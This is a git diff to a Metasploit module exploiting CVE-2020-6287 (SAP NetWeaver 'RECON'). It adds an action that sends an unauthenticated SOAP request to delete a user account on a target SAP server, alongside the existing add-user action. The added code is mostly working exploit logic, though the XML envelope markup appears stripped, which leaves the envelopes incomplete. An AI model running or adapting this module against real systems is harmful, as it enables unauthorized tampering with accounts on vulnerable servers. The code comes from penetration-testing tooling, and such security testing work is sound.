diff --git a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
index d3986fa7ed..55b551b726 100644
--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
'Notes' => {
'AKA' => [ 'RECON' ]
},
+ 'Actions' => [
+ [ 'ADD', { 'Description' => 'Add the specified user' } ],
+ [ 'REMOVE', { 'Description' => 'Remove the specified user' } ]
+ ],
+ 'DefaultAction' => 'ADD',
'DisclosureDate' => '2020-07-14'
)
)
@@ -66,6 +71,15 @@ class MetasploitModule < Msf::Auxiliary
end
def run
+ case action.name
+ when 'ADD'
+ action_add
+ when 'REMOVE'
+ action_remove
+ end
+ end
+
+ def action_add
job = nil
print_status('Starting the PCK Upgrade job...')
job = invoke_pckupgrade
@@ -118,6 +132,38 @@ class MetasploitModule < Msf::Auxiliary
end
end
+ def action_remove
+ message = { name: 'DeleteUser' }
+ message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+
+ #{datastore['USERNAME'].encode(xml: :text)}
+
+ ENVELOPE
+
+ envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+
+
+
+
+
+ sap.com/tc~lm~config~content
+ content/Netweaver/ASJava/NWA/SPC/SPC_DeleteUser.cproc
+
+
+ #{Rex::Text.encode_base64(message[:data])}
+ #{message[:name]}
+
+
+
+
+ ENVELOPE
+
+ res = send_request_soap(envelope)
+ fail_with(Failure::UnexpectedReply, 'Failed to delete the user') unless res&.code == 200
+
+ print_good('Successfully deleted the user account')
+ end
+
def report_error_details(job)
print_error('Received a general error notification')
error_event = job.get_event